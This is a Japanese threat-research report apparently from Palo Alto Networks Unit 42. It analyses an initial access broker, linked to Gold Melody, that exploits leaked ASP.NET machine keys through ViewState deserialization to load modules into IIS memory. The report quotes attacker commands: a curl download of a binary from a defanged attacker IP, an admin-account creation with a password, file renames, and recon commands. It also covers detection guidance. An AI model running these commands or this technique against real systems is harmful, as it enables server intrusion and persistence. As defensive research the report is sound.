[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.jp/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/ja/)  
Menu

* [セキュリティ コンサルティング](https://www.paloaltonetworks.com/unit42)
* [**現在、攻撃を受けていますか?**](https://start.paloaltonetworks.com/contact-unit42.html)  
  Japanese
* [English](https://unit42.paloaltonetworks.com/initial-access-broker-exploits-leaked-machine-keys/)
* [Spanish (LATAM)](https://unit42.paloaltonetworks.com/es-la/initial-access-broker-exploits-leaked-machine-keys/)
* [French](https://unit42.paloaltonetworks.com/fr/initial-access-broker-exploits-leaked-machine-keys/)
* [Japanese](https://unit42.paloaltonetworks.com/ja/initial-access-broker-exploits-leaked-machine-keys/)
* [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research")
* [脅威アクター グループ](https://unit42.paloaltonetworks.com/ja/category/threat-actor-groups-ja/ "脅威アクター グループ")
* [サイバー犯罪](https://unit42.paloaltonetworks.com/ja/category/cybercrime-ja/ "サイバー犯罪")  
  [サイバー犯罪](https://unit42.paloaltonetworks.com/ja/category/cybercrime-ja/)

# GoldMelody の隠されたコード: イニシャル アクセス ブローカーのインメモリ IIS モジュールが明らかに

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 4 分で読めます  
Related Products  
[![Advanced DNS Security icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced DNS Security](https://unit42.paloaltonetworks.com/ja/product-category/advanced-dns-security-ja/ "Advanced DNS Security")[![Advanced URL Filtering icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced URL Filtering](https://unit42.paloaltonetworks.com/ja/product-category/advanced-url-filtering-ja/ "Advanced URL Filtering")[![Cloud-Delivered Security Services icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Cloud-Delivered Security Services](https://unit42.paloaltonetworks.com/ja/product-category/cloud-delivered-security-services-ja/ "Cloud-Delivered Security Services")[![Cortex icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png)Cortex](https://unit42.paloaltonetworks.com/ja/product-category/cortex-ja/ "Cortex")[![Cortex XDR icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png)Cortex XDR](https://unit42.paloaltonetworks.com/ja/product-category/cortex-xdr-ja/ "Cortex XDR")[![Cortex XSIAM icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png)Cortex XSIAM](https://unit42.paloaltonetworks.com/ja/product-category/cortex-xsiam-ja/ "Cortex XSIAM")[![Unit 42 Incident Response icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/unit42_RGB_logo_Icon_Color.png)Unit 42 Incident Response](https://unit42.paloaltonetworks.com/ja/product-category/unit-42-incident-response-ja/ "Unit 42 Incident Response")

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  著者:
  
  * [Tom Marsden](https://unit42.paloaltonetworks.com/ja/author/tom-marsden/)
  * [Chema Garcia](https://unit42.paloaltonetworks.com/ja/author/chema-garcia/)

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  公開日:2025年7月8日

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  カテゴリー
  
  * [サイバー犯罪](https://unit42.paloaltonetworks.com/ja/category/cybercrime-ja/)
  * [脅威アクター グループ](https://unit42.paloaltonetworks.com/ja/category/threat-actor-groups-ja/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  タグ:
  
  * [GoLang](https://unit42.paloaltonetworks.com/ja/tag/golang-ja/)
  * [Initial Access](https://unit42.paloaltonetworks.com/ja/tag/initial-access/)
  * [Microsoft](https://unit42.paloaltonetworks.com/ja/tag/microsoft-ja/)
  * [Web server](https://unit42.paloaltonetworks.com/ja/tag/web-server-ja/)
  * [Web shells](https://unit42.paloaltonetworks.com/ja/tag/web-shells-ja/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/ja/initial-access-broker-exploits-leaked-machine-keys/?pdf=download&lg=ja&_wpnonce=8eff5d0d06 "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/ja/initial-access-broker-exploits-leaked-machine-keys/?pdf=print&lg=ja&_wpnonce=8eff5d0d06 "Click here to print")

共有![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)
* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](mailto:?subject=GoldMelody%20の隠されたコード:%20イニシャル%20アクセス%20ブローカーのインメモリ%20IIS%20モジュールが明らかに&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Finitial-access-broker-exploits-leaked-machine-keys%2F "Share in email")
* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Finitial-access-broker-exploits-leaked-machine-keys%2F "Share in Facebook")
* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Finitial-access-broker-exploits-leaked-machine-keys%2F&title=GoldMelody%20の隠されたコード:%20イニシャル%20アクセス%20ブローカーのインメモリ%20IIS%20モジュールが明らかに "Share in LinkedIn")
* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Finitial-access-broker-exploits-leaked-machine-keys%2F&text=GoldMelody%20の隠されたコード:%20イニシャル%20アクセス%20ブローカーのインメモリ%20IIS%20モジュールが明らかに "Share in Twitter")
* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Finitial-access-broker-exploits-leaked-machine-keys%2F&ts=markdown "Share in Reddit")
* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](https://mastodon.social/share?text=GoldMelody%20の隠されたコード:%20イニシャル%20アクセス%20ブローカーのインメモリ%20IIS%20モジュールが明らかに%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Finitial-access-broker-exploits-leaked-machine-keys%2F "Share in Mastodon")

## エグゼクティブ サマリー

Unit 42 の研究者は、流出したマシン キー(ASP.NETサイトで使用される暗号キー)を悪用して標的組織にアクセスする、イニシャル アクセスブローカー(IAB)によるキャンペーンを発見することに成功しました。IABとは、組織に侵入しそのアクセス権を他の脅威アクターに売る組織を指します。

本レポートでは、これらの攻撃で使用されたツールを分析します。このアクターを[暫定グループ](https://unit42.paloaltonetworks.com/ja/from-activity-to-formal-naming/)TGR-CRI-0045として追跡しました。グループは日和見主義的なアプローチをとっており、ヨーロッパとアメリカの金融サービスをはじめ、製造業、卸売・小売業、ハイテク、運輸・物流の業界を対象に組織を攻撃していることが確認されました。

IABは流出したキーを用いて悪意のあるペイロードに署名を行うことで標的のサーバーへの不正アクセスを成功させており、このテクニックはASP.NETView Stateのデシリアライゼーションと呼ばれるものです。 このテクニックでは、IABは悪意のあるペイロードをサーバーのメモリ内で直接実行することが可能であり、ディスク上の存在を最小限に抑え、フォレンジック アーチファクトをほとんど残さないため、検出がより困難になります。

弊社では暫定グループTGR-CRI-0045 を、中程度の信頼性をもって、Gold Melody (別名: UNC961、Prophet Spider)と断定しています。この評価は、以下の重複に基づくものです。

* セキュリティ侵害インジケーター (IoC)
* 手法、戦術、手順(TTP)
* 被害者学

本レポートでは、TGR-CRI-0045 のインフラ、およびネットワーク上の他のシステムに関する情報を収集し、悪用されたシステムへのアクセスを維持するために使用されたツールについても分析しています。ツールは現在も開発が継続されていることが分かりました。

窃取とツールデプロイメントの最も早い証拠は2024年10月で、2025年1月下旬から3月にかけて活動が大幅に増加しています。この急増には、オープンソースのポート スキャナーや、永続化(アクセス権の維持)や権限昇格(より高いレベルのアクセス権の獲得)のための特注ユーティリティなど、不正侵入後のツールの導入も含まれていました。

Unit 42は、この脅威の影響を受けた約12の組織でインシデントの確認またはその脅威対応をしており、ほとんどのケースにおいて露出したマシン キーが根本原因であることが判明しました。 従って、弊社では[Microsoftのガイダンス](https://www.microsoft.com/en-us/security/blog/2025/02/06/code-injection-attacks-using-publicly-disclosed-asp-net-machine-keys/)を参照することを強く推奨しており、 各組織のセキュリティ担当者は、ASP.NETインターネット インフォメーション サービス(IIS)サイトにおいて、侵害されたマシン キーを特定し、修復する知識を習得する必要があります。

パロアルトネットワークスのお客様は、以下の製品を通じて、本書で取り上げるツールに対する確実な保護を構築いただけます。

* [Advanced WildFire](https://docs.paloaltonetworks.com/wildfire)の機械学習モデルと分析技術は、本研究で共有されたインジケーターに照らして見直され、更新されています。
* [Cortex XDR](https://docs-cortex.paloaltonetworks.com/p/XDR)は、[XSIAM](https://docs-cortex.paloaltonetworks.com/p/XSIAM) IISプロテクションモジュールにより、IISのデシリアライズ悪用に対する保護をすぐに提供することが可能です。

情報漏えいの可能性がある場合、または緊急の案件がある場合は、[Unit 42インシデント レスポンス チーム](https://start.paloaltonetworks.com/contact-unit42.html)までご連絡ください。

| **Unit 42の関連トピック** | [**Microsoft**](https://unit42.paloaltonetworks.com/ja/tag/microsoft-ja/), **[Web Shells](https://unit42.paloaltonetworks.com/ja/tag/web-shells-ja/)** , [**Golang**](https://unit42.paloaltonetworks.com/ja/tag/golang-ja/) |
|--------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|

## テクニカル分析

#### TGR-CRI-0045を発見したマネージド脅威ハンティング: データ窃取の急増

2025年1月30日から2月2日にかけて、Unit 42は2つの顧客環境でWebサーバーへの侵入に対応しました。どちらのケースでも、IISワーカープロセス(w3wp.exe)からコマンドシェルが実行されています。これらの侵入には、次のような共通の特徴がありました。

* 標準出力と標準エラー出力のリダイレクトを使ったcmd.exeの起動: cmd /c your\_command\_here 2\>\&1
* ステージング ディレクトリ: C:\\Windows\\Temp\\111t
* curl経由で取得したファイル: hxxp://195.123.240\[.\]233:443/atm

#### より広範な調査

予想に反して、影響を受けたエンドポイントの調査では、最近アップロードされたWebシェルは見つかりませんでした。しかし、調査を拡大したところ、他テナントのハンズオン キーボードの侵入でも、同じcmd.exeの呼び出しとステージング ディレクトリの悪用が行われていたことが明らかになりました。

遠隔測定により、攻撃者はマネージド.NETアセンブリ(C#コード)をメモリに直接ロードするコマンド(リフレクティブ ローディング)を実行したことが確認されました。この悪用は、悪意のあるペイロードのデシリアライズを介して、[Microsoft IIS](https://www.iis.net/)で実行されているASP.NETサイト内の内部パラメータであるView Stateを標的としたものです。デシリアライゼーションとは、転送または保存用にエンコードされたデータをアプリケーションの内部状態に変換するプロセスを指します。[MSTICが報告しているように](https://www.microsoft.com/en-us/security/blog/2025/02/06/code-injection-attacks-using-publicly-disclosed-asp-net-machine-keys/)、この悪用は被害者がアプリケーション内で静的で露出したマシン キーを使用することによって可能になったことが疑われます。

IISの脆弱性を悪用する金銭的動機のある脅威アクターに関する公的な報告は限られています。本レポートはこのギャップに対処すべく、攻撃者の手口に関する洞察を提供するものであり、.NETデシリアライゼーションの悪用に関する理解を深めることにむけられたものです。本記事を通した情報共有をもって、防衛側がこれらの脅威に効果的に対応できるになることを願います。

### 被害を受けたサーバーを悪用したTGR-CRI-0045の手法

#### 入門: IISとASP.NETのView Stateの窃取

TGR-CRI-0045のアクセスを解説するにあたって、IIS、ASP.NET、View Stateの役割をはじめ、侵害されたキーマテリアル がどのようにリモート コードの実行を可能にするかをまず理解する必要があります。IISはASP.NETを含むさまざまなWebアプリケーション技術をサポートするWebサーバーです。このフレーム ワークにより、開発者はC#やVB.NETなどの.NET言語を使用して、動的なサーバーサイド アプリケーションを作成できます。

ASP.NETのWebサイトは、ユーザーのブラウザとサーバー間のインタラクションを管理するためにView Stateを使用しています。View Stateは、リクエスト間でフロントエンドのコントロール(チェック ボックスや入力フィールドなど)の状態を保持し、リクエストに含まれるこの情報を\_\_VIEWSTATEという隠しHTTPパラメータに格納します。このパラメータは.NETの様々なデシリアライズ技術に対して脆弱であり、攻撃者がこのパラメータを保護するために使用されるキーを知っている場合、リモートでコードを実行される可能性があります。

ValidationKey(完全性用)とオプションのDecryptionKeyで構成されるマシン キーは、デフォルトでASP.NETのView Stateを操作から保護します。しかし、攻撃者は、コードの再利用をすることで、本番サイトにしばしば存在する一般に入手可能な流出したマシン キーのリストを活用することができるとされています(この記事の最後で参照)。

攻撃者は実行中のサーバーから直接マシンキーを窃取することも可能です。そして有効なマシン キーのセットがあれば、攻撃者は悪意のあるデシリアライズペイロードを作成し、脆弱なサーバーをターゲットにして、IISワーカープロセスのコンテキスト内で任意のコードを実行することができます。

この攻撃の潜在的な範囲は甚大です。View Stateは、ASP.NET上で実行されている特定のサイトやアプリケーションに関係なく、特定のコンポーネントで無効化されていても送信されるからです。漏洩したマシン キーを持つASP.NETサイトを実行しているすべてのIISサーバーは、脆弱である可能性が高いとされます。脅威行アクターがどのようにマシン キーを保存し、アクセスするかについての詳細な説明については、こちらの[Zeroed.techのブログ記事](https://zeroed.tech/blog/viewstate-the-unpatchable-iis-forever-day-being-actively-exploited/)を読むことを強くお勧めします。

#### View Stateのペイロードの生成と実行

TGR-CRI-0045は、オープンソースのNETデシリアライズ ペイロード生成ツールであるysoserial.netとその [View Stateプラグイン](https://github.com/pwntester/ysoserial.net/blob/master/ysoserial/Plugins/ViewStatePlugin.cs)のようなツールを使用して、悪意のあるデシリアライズ ペイロードを構築した可能性があります。ペイロードの目的は以下の通りです。

* 事前に公開されたマシン キーを使用して有効な暗号署名を作成し、組み込みのView State保護をバイパスする。(侵害されたサイトには、既知の拒否リストに存在するマシン キーを含むWeb.configファイルが存在することが多い)
* [XamlAssemblyLoadFromFileガジェットを使用する](https://github.com/pwntester/ysoserial.net/blob/master/ysoserial/Generators/XamlAssemblyLoadFromFileGenerator.cs) (デシリアライズガジェットは、XAMLフォーマットデータに依存)。
  * 悪意のあるデシリアライズのトリガー
  * \_\_VIEWSTATEパラメータに含まれるBase64エンコードされたgzipストリームから.NETアセンブリをメモリ上にロードして実行する。

ロードされた .NETアセンブリは、配信用 HTTPリクエストと同じライフサイクルを持ちます。攻撃者はエクスプロイトのペイロードを起動し、標的となったサーバーはそれを処理します。これにより、ペイロードは同じリクエスト内にバンドルされた入力パラメーターを使用して実行され、HTTPレスポンスを通じて元のリクエストに出力を返します。

一度処理されたペイロードは再利用できません。この 「単発」エクスプロイト攻撃では、各コマンドに対して個別の試行が必要となるため、エクスプロイトの試行とコマンドの実行の比率は1:1となります。下の図1はこのプロセスを示したものです。
![HTTPのリクエストとレスポンスのプロセスを表した図。設定、ユーザー、サーバー、ドキュメントを表すアイコンを含む。テキスト ボックスには、URLやGETやPOSTなどのHTTPメソッド、レスポンスなどのプロセスの要素が表示されている。](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/JP_VIEWSTATE-786x321.png) 図1.ペイロードを構築するためのオペレーターのアクションと、そのレスポンスがどのように送り返されるかを示した評価フロー。

### TGR-CRI-0045 IIS モジュールの復元と分析

侵害された環境において、View State の悪用に成功した後にメモリにロードされた以下の5つの.NETアセンブリのサブセットを確認しました。

* **Cmd /c**:弊社では3つのバリアントを特定しています。それぞれ異なるHTTPパラメーターを使用して、システムのコマンド シェルにコマンドを渡すもので、これにより攻撃者はサーバー上で任意のコマンドを実行できるようになります。
* \*\*ファイルのアップロード:\*\*ターゲット ファイルのパスと、ファイルの内容を含むバイト バッファを指定することで、攻撃者はサーバーにファイルをアップロードできるようになっています。
* **Winner**:これはおそらく悪用のチェックであり、攻撃者に勝利を報告し、悪用が成功したことを確認するものです。
* **ファイルのダウンロード:**(未発見) インポートされた関数から、このモジュールはダウンローダーであることが分かり、弊社では攻撃者が侵害されたサーバーから機密データを取得することを可能にするものだと考えています。
* **リフレクティブ ローダー:**(未回収) インポートされた関数から、モジュールがリフレクティブ ローダーであることが推察されました。これは攻撃者がディスクに書き込むことなく、追加の.NETアセンブリをメモリ上に動的にロードし実行する際に使用するものです。

回収されたアセンブリーは、共通のデータ処理特性を持つことが分かりました。HTTPパラメータに埋め込まれたペイロードを解読するために、単純な1文字のXORキーxを使用していることが確認できました。

アセンブリはまた、httpContext.response.Flush() の後に httpContext.response.End()を呼び出してHTTPレスポンスを終了することが分かりました。このため、ASP.NETが悪意のあるペイロードを正しくデシリアライズできなかった場合に生成されるフォレンジック データの量が減少し、検出とインシデント レスポンスをより困難にしています。

アセンブリ名E - デフォルト [ysoserial.net ExploitClass](https://github.com/pwntester/ysoserial.net/blob/master/ExploitClass/ExploitClass.cs)名 - 最も頻繁に発生。名前の重複を避けるため、攻撃者はいくつかのモジュールの名前を変更しています(例: Dwとd)。

以下の図2-6は、C# .csファイルとして書かれたと思われる、回収されたモジュールのソースコードを示したものです。コンパイル(ソースコードを実行可能コードに変換すること)は、使用する[ysoserial.net](https://ysoserial.net) ガジェットによって異なります。最も頻繁に観測されたのは XamlAssemblyLoadFromFile ガジェットであり、悪用中に攻撃者のシステム上で .NET アセンブリをコンパイルし、インメモリの実行を目的にターゲット サーバーに送信するものです。

**cmdペイロード**
![シンタックス ハイライト機能付きテキスト エディタでのコードスニペットのスクリーンショット。コードには、例外の処理、「cmd.exe」を実行するプロセスの開始、標準入出力のリダイレクト、HTTPコンテキストのクリアが含まれている。エディター インターフェースはダークモードを使用し、コードの横に行番号が見える。](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/word-image-136721-147220-2.png) 図2.sec-fetch-modeヘッダを持つcmd /c variantペイロードのソース。 ![HTTPコンテキストとシステム プロセスに関連する関数とコマンド(エラー処理とコマンドライン引数の取得に関する参照を含む)を特徴とする、テキストエディタでのコンピューター コードのスクリーンショット。](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/word-image-140893-147220-3.png) 図3.cmdヘッダーを持つcmd /cバリアントのソース。 ![シンタックス ハイライトを使ったコンピューター コードのスクリーンショット。コードには、エラー処理とHTTPコンテキスト操作に関する関数とコメントが含まれている。](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/word-image-144071-147220-4.png) 図4.cmd /c の\_\_Valueパラメータと1文字のXOR暗号化を持つバリアントのソース。

**ファイルのアップロード**
![配列操作やHTTPコンテキストの処理など、さまざまな機能を持つコードを表示するコンピュータのコードエディターのスクリーンショット。コードにはシンタックス ハイライトがあり、ダークモードで表示されている。](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/word-image-148387-147220-5.png) 図5.それぞれ \_\_Fvalue と \_\_Bvalue パラメータでパスとファイルの内容を受け取るファイルアップロードアセンブリのソース。

**エクスプロイト チェッカー**
![シンタックス ハイライト付きエディターでHttpContextを使用したコンピューター コードのスクリーンショット。](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/word-image-152555-147220-6.png) 図6.エクスプロイト チェッカー アセンブリーのソース。エクスプロイトが成功したことを示すメッセージ「u a win」をオペレーターに書き戻している。

#### アセンブリの運用

2024年10月から2025年1月にかけて、この脅威アクターの活動は主に、システムの悪用、エクスプロイト チェッカーのようなモジュールのデプロイ、基本的なシェル偵察の実行に集中していました。

### ハンズオン キーボード ポスト エクスプロイテーション

侵入後の活動は、主に侵害されたホストとその周辺ネットワークの偵察です。6月初旬の時点では、横方向への移動は見られませんでした。

観測されたすべての侵入に一貫した特徴として、TGR-CRI-0045は、ツールとデータのステージング ディレクトリとしてC:∕WindowsTemp∕Temp∕を使用していました。いくつかの個別での事例では、脅威アクターがC:\\Windows\\Temp\\gen\_pyディレクトリとやり取りしているのを確認しましたが、そこにツールや流出したデータを保存している形跡は見つかりませんでした。

#### ローカル特権の昇格と永続性

脅威アクターは主に、updf という名前のカスタム C# バイナリを使用してローカル権限の昇格を達成しています。この名前は、ファイルをPDFエディタ UPDFとして偽装するために使われた可能性が高いです。

updfバイナリは、そのコードベースに部分的に実装されている機能から、活発に開発されていることが伺えます。これは[GodPotatoエクスプロイト](https://github.com/BeichenDream/GodPotato)を使用するもので、Windowsの名前付きパイプを悪用して特権サービス(epmapperなど)になりすまし、SYSTEMレベルのアクセスを取得するものです。

updfはSYSTEM権限でコマンドを実行することが可能であり、最も一般的な用途としては、新しいローカル ユーザーを作成し、そのユーザーをローカル管理者グループに追加することです。

* c:\\windows\\temp\\111t\\updf.exe -nadm 'support:Sup0rt\_1!admin'

ある事例では、TGR-CRI-0045がweb.configファイル(ASP.NET設定ファイル)をエクスポートし、特定のページの設定を\<allow users="\*"/\>に変更しており、代替サーバーへのアクセス認証をバイパスする可能性がありました。この修正されたページが、TGR-CRI-0045によって再度悪用することができる既存の脆弱なページなのか、ディスクベースのWebシェルなのかは確認できませんでした。

#### ステージド バイナリのダウンロード

観測された侵入のほとんどは、wgetやcurlを使ってatmという名前のELFバイナリをダウンロードするものでした。攻撃者がcurlを使用した場合、そのホストにあらかじめ存在していた可能性が高いとされます。wget.exeを使用した場合、ファイル アップロードのペイロードを実行することで、ターゲット サーバーにアップロードされた可能性が高いです。このatmバイナリは、横方向の移動の成功後、Linuxサーバー上で悪意ある活動をサポートする可能性があります。以下は、atmバイナリをダウンロードするためのcurlコマンドの例です。

* curl hxxp://195.123.240\[.\]233:443/atm

#### TXPortMap

TGR-CRI-0045は[TxPortMap](https://github.com/4dogs-cn/TXPortMap)を使用しています。これはGolangポートスキャナおよびバナーグラバであり、 txp.exeまたはtxpm.exeとして実行されています。これは最初に侵害されたホスト(beachhead)からアクセス可能な内部サーバーを特定するために使用されており、これにより攻撃者は内部ネットワークをマッピングし、潜在的な悪用可能なターゲットを特定することに成功しています。

#### 偵察活動

この脅威アクターは、5分間にわたり、以下のコマンドを使用して、コマンドシェル アセンブリー経由でローカルおよびネットワークの偵察を行っています。

表1に偵察コマンドを示します。

|--------------------------|---------------------------------------------------------------------|
| **コマンド**                 | **内容**                                                              |
| tasklist                 | システム上で実行中のすべてのプロセスを一覧表示                                             |
| ipconfig /all            | IPアドレス、ドメインネームサーバー(DNS)サーバー、メディア アクセス制御(MAC)アドレスなど、システムのネットワーク構成を表示 |
| quser                    | ログインしているユーザーの情報を表示                                                  |
| whoami /all              | 現在のユーザーのIDとグループメンバーシップを表示する                                         |
| nltest /domain\_trusts    | ドメイン トラストを列挙する                                                      |
| net user                 | ローカル ユーザー アカウントを一覧表示                                                |
| systeminfo               | OSのバージョンやハードウェアの詳細など、詳細なシステム情報を表示                                   |
| dir \<user directories\> | ユーザー ディレクトリ内のファイルとディレクトリを一覧表示                                       |

*表1.脅威アクターの偵察コマンド。*

#### アップロードされた実行可能ファイルの名前を防衛回避を目的に変更

ファイル アップロード アセンブリでは、1文字、2文字、3文字のファイル名で実行ファイルをアップロードすることが確認されました。これがアセンブリ自体の制限によるものなのか、回避手法として、拡張子なしでファイルをアップロードする意図的なものなのかは不明です。その後、攻撃者はコマンド シェル アセンブリを使用して、ステージング ディレクトリ内でこれらのファイルを有効な拡張子にリネームし、ファイルが不審に見えないように偽装しています。

ファイル名の変更に使用するコマンド例:

* "cmd.exe" /c move c:\\windows\\temp\\111t\\tx2 c:\\windows\\temp\\111t\\txp.exe 2\>\&1
* "cmd.exe" /c move c:\\windows\\temp\\111t\\tx c:\\windows\\temp\\111t\\txpm.exe 2\>\&1
* "cmd.exe" /c move c:\\windows\\temp\\111t\\w c:\\windows\\temp\\111t\\wget.exe 2\>\&1

ツールと偵察の実行後、脅威アクターはディスク上に残っていたツールと111tディレクトリを削除しています。

### アトリビューションとターゲティング

IoC、TTP、および被害者情報の重複に基づき、Unit 42ではTGR-CRI-0045がGold Melodyに関連していることを中程度の信頼度で評価しています。

TGR-CRI-0045はヨーロッパと米国の組織を標的にしており、攻撃ベクトルと一致する日和見的なアプローチをとっていることが分かっています。特定された活動以来、グループは以下の業界の組織を対象としており、対象となったほとんどの組織は米国に拠点を置いています。

* 証券・投資サービス
* 製造 - 建築資材
* 製造 - 粘土耐火物
* 製造 - 外科/医療器具
* 卸売・小売
* ハイテク
* 運輸・物流
* パッケージ ソフトウェア サービス
* データ処理・準備
* 金融サービス
* 中古品・商品再販業者
* カスタム コンピューター プログラミング サービス

### サイバー犯罪がインメモリ IISを採用する意味とブルー チームにとっての重要なポイント

#### ステルス アクセスと長い滞留時間

インメモリIIS トレードクラフトは、検出を著しく妨げます。適切な遠隔測定がなければ、View Stateデシリアライズ攻撃は事実上確認することが不可能であり、修復は通常、新しいマシン キーが生成されるか、サーバーが廃止されたときにのみ行われます。これにより脅威行アクター、特にIABは、侵害されたシステムのプールに長期的かつ低フットプリントでアクセスし続けることができます。

#### POSTリクエストの遠隔測定:潜在的な弱点をカバーする

View Stateのデシリアライズ ペイロードは、GETリクエストのURIパラメータを介して配信することができますが、攻撃者は通常、POSTリクエスト内に\_\_VIEWSTATEパラメータを含めます。POSTリクエストは、そのサイズと潜在的な機密性のため、IISサーバー、プロキシ、ロードバランサー、セキュリティ アプライアンスによってログに記録されることはほとんどありません。

POSTリクエストを条件付きでフィルタリングし、ログに記録するソリューションの実装を検討することが重要です。オプションは以下の通りです。

* カスタム ロギング ルール
* Web 観測可能性フレームワーク
* エンドポイント ディテクション\&レスポンス エージェント
* ネットワーク セキュリティ アプライアンス

#### 検討可能な検出手段: Windowsイベント ログ

Windowsでは、ASP.NETイベント ログにイベントID1316としてView Stateのデシリアライズの失敗が記録されている可能性があります。これらのログを確認し、失敗したView Stateペイロードに悪意のあるバイナリが含まれていないかチェックします。バイナリまたは暗号化されたデータ(View Stateの暗号化が無効の場合)を含むView Stateは非常に疑わしいとされます。

#### 単発のエクスプロイト: 限定的なアプローチ

TGR-CRI-0045 は、ステートレスの単一アセンブリを直接ロードするという、単純化されたアプローチで View State を利用しており、ここではコマンドを実行する度にアセンブリの再エクスプロイトと再アップロードが必要になります(例えばファイルアップロードアセンブリを複数回実行するなど)。新しいディレクトリ一覧や新しいプロセスを実行する場合も同様です。アセンブリー、パラメーター、エクスプロイト コードが提出され、実行され、1回のリクエストで結果が返されます。この単発のアプローチは、攻撃者が侵害されたシステムとやりとりする能力を制限するものです。

TGR-CRI-0045 が View State を悪用した永続的な Webシェル (ディスクまたはメモリにバッ クされている)をデプロイしない場合でも、防御者は以下の点に注意する必要があります。

* **エクスプロイト攻撃はすべてチャンス**
  * エクスプロイト攻撃を試みるたびに、攻撃者は既存のセキュリティ ツールやモニタリングではおそらく見えないペイロードを実行する機会を得ます。
* **Webシェルがないからといって侵害がないとは限らない**
  * Webシェルがないことは、サーバーが悪用されていないことを示すものではありません
* **再エクスプロイトが必要**
  * TGR-CRI-0045は、リクエスト間で永続的なモジュールをロードしない限り、ペイロードを実行したいたびにサーバーをする必要があります
* **ステートフルなエクスプロイト攻撃が可能**
  * TGR-CRI-0045はステートレス モジュールをデプロイしていますが、脅威アクターがステートフルな IIS ポスト エクスプロイト .NETアセンブリをデプロイしている事例が文書化されています。これらは ASP.NETと.NET変数に格納されたデータに依存しており、Web処理パイプラインからアクセス可能であり、リクエスト間で永続的とされます。[IceAppleに関するCrowdStrikeのレポート](https://www.crowdstrike.com/en-us/blog/falcon-overwatch-detects-iceapple-framework/)は、そのようなフレームワークの一例です。

#### MITRE ATT\&CKのテクニック

* [T1036.005](https://attack.mitre.org/techniques/T1036/005/) - Masquerading:正当な名前またはロケーション(updfバイナリ)に一致する
* [T1036.010](https://attack.mitre.org/techniques/T1036/010/) - Masquerading:アカウント名の偽装
* [T1046](https://attack.mitre.org/techniques/T1046/)- ネットワーク サービス ディスカバリ(TxPortMap)
* [T1059.003](https://attack.mitre.org/techniques/T1059/003/) - コマンドとスクリプトのインタープリタ: Windowsコマンドシェル(cmd.exe)
* [T1071.001](https://attack.mitre.org/techniques/T1071/001/) - アプリケーション層プロトコル: Webプロトコル(HTTP View State)
* [T1082](https://attack.mitre.org/techniques/T1082/) - システム情報検出(systeminfo、ipconfig)
* [T1105](https://attack.mitre.org/techniques/T1105/) - イングレス ツール転送(wget, curl)
* [T1134.001](https://attack.mitre.org/techniques/T1134/001/) - アクセストークン操作: トークンのなりすまし/窃取(updfのGodPotatoエクスプロイト)
* [T1136.001](https://attack.mitre.org/techniques/T1136/001/) - アカウント作成:ローカル アカウント(updf)
* [T1190](https://attack.mitre.org/techniques/T1190/) - 公開アプリケーションの悪用(View Stateのデシリアライズ)
* [T1217](https://attack.mitre.org/techniques/T1217/) - ブラウザ情報の発見
